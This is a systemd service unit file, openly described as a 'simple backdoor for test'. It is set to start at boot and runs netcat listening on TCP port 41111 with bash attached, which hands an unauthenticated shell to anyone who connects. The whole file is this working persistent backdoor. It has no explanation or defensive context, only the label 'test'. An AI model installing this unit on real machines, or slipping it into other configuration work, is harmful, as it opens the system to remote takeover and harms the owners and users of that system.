[Unit]
Description=Just a simple backdoor for test
After=network.target
[Service]
Type=forking
ExecStart=bash -c "nc -l -p 41111 -e /bin/bash &"
ExecReload=
ExecStop=
PrivateTmp=true
[Install]
WantedBy=multi-user.target
